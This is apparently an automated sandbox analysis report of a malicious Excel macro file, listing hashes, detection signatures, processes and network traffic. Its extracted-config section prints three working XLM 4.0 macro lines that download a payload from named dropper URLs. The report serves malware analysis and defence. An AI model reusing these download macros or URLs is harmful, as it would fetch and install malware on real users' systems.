Analysis

  • max time kernel
    184s
  • max time network
    191s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    12-05-2022 16:29

General

  • Target

    ?i=1zjqrjjyu.xlsm

  • Size

    83KB

  • MD5

    cf82eec9632dc53d54c38f1d7b8a1b71

  • SHA1

    7b7e3339a8e857f1525341c074571ee7d7e9dd7f

  • SHA256

    9fbfeb3873dee627be46cf7c10015435d027d718dd42a7842badd45e590f782b

  • SHA512

    346297dc7ce5b9caf84b766e40339372012f3401f010a7473a52cdb9a56027bdef53869a7aa543b67aa890536d442ed718583b04a7328302a164b7dba6f6dd29

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source
1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://yuanbinglun.com/www.yuanbinglun.com/7kKwqmxRWQK0OLi/", "..\dwa.ocx")
2
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://laserjetprintersreview.xyz/wp-includes/BJ6yUJ/", "..\dwa.ocx")
3
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://2021.posadamision.com/wp-admin/IoqaL08/", "..\dwa.ocx")
URLs
xlm40.dropper

http://yuanbinglun.com/www.yuanbinglun.com/7kKwqmxRWQK0OLi/

xlm40.dropper

http://laserjetprintersreview.xyz/wp-includes/BJ6yUJ/

xlm40.dropper

http://2021.posadamision.com/wp-admin/IoqaL08/

Signatures

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\_i=1zjqrjjyu.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2284

Network

  • flag-us
    DNS
    96.108.152.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    96.108.152.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    yuanbinglun.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    yuanbinglun.com
    IN A
    Response
    yuanbinglun.com
    IN A
    101.200.218.166
  • flag-us
    DNS
    2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa
    Remote address:
    8.8.8.8:53
    Request
    2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa
    IN PTR
    Response
  • flag-us
    DNS
    laserjetprintersreview.xyz
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    laserjetprintersreview.xyz
    IN A
    Response
  • flag-us
    DNS
    2021.posadamision.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    2021.posadamision.com
    IN A
    Response
  • 2.22.22.99:443
    tls
    46 B
    71 B
    1
    1
  • 2.22.22.96:443
    tls
    46 B
    71 B
    1
    1
  • 2.22.22.96:443
    tls
    46 B
    71 B
    1
    1
  • 2.22.22.96:443
    tls
    46 B
    71 B
    1
    1
  • 93.184.220.29:80
    46 B
    40 B
    1
    1
  • 93.184.220.29:80
    322 B
    7
  • 93.184.220.29:80
    260 B
    5
  • 13.69.239.73:443
    322 B
    7
  • 40.125.122.151:443
    260 B
    5
  • 93.184.220.29:80
    260 B
    5
  • 204.79.197.203:80
    322 B
    7
  • 101.200.218.166:80
    yuanbinglun.com
    EXCEL.EXE
    260 B
    5
  • 8.238.111.254:80
    322 B
    7
  • 8.238.111.254:80
    322 B
    7
  • 8.8.8.8:53
    96.108.152.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    96.108.152.52.in-addr.arpa

  • 8.8.8.8:53
    yuanbinglun.com
    dns
    EXCEL.EXE
    61 B
    77 B
    1
    1

    DNS Request

    yuanbinglun.com

    DNS Response

    101.200.218.166

  • 8.8.8.8:53
    2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa
    dns
    118 B
    204 B
    1
    1

    DNS Request

    2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa

  • 8.8.8.8:53
    laserjetprintersreview.xyz
    dns
    EXCEL.EXE
    72 B
    137 B
    1
    1

    DNS Request

    laserjetprintersreview.xyz

  • 8.8.8.8:53
    2021.posadamision.com
    dns
    EXCEL.EXE
    67 B
    143 B
    1
    1

    DNS Request

    2021.posadamision.com

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2284-132-0x00007FFD2ACB0000-0x00007FFD2ACC0000-memory.dmp

    Filesize

    64KB

  • memory/2284-131-0x00007FFD2ACB0000-0x00007FFD2ACC0000-memory.dmp

    Filesize

    64KB

  • memory/2284-130-0x00007FFD2ACB0000-0x00007FFD2ACC0000-memory.dmp

    Filesize

    64KB

  • memory/2284-133-0x00007FFD2ACB0000-0x00007FFD2ACC0000-memory.dmp

    Filesize

    64KB

  • memory/2284-134-0x00007FFD2ACB0000-0x00007FFD2ACC0000-memory.dmp

    Filesize

    64KB

  • memory/2284-135-0x00007FFD28750000-0x00007FFD28760000-memory.dmp

    Filesize

    64KB

  • memory/2284-136-0x00007FFD28750000-0x00007FFD28760000-memory.dmp

    Filesize

    64KB

  • memory/2284-138-0x00007FFD2ACB0000-0x00007FFD2ACC0000-memory.dmp

    Filesize

    64KB

  • memory/2284-139-0x00007FFD2ACB0000-0x00007FFD2ACC0000-memory.dmp

    Filesize

    64KB

  • memory/2284-140-0x00007FFD2ACB0000-0x00007FFD2ACC0000-memory.dmp

    Filesize

    64KB

  • memory/2284-141-0x00007FFD2ACB0000-0x00007FFD2ACC0000-memory.dmp

    Filesize

    64KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.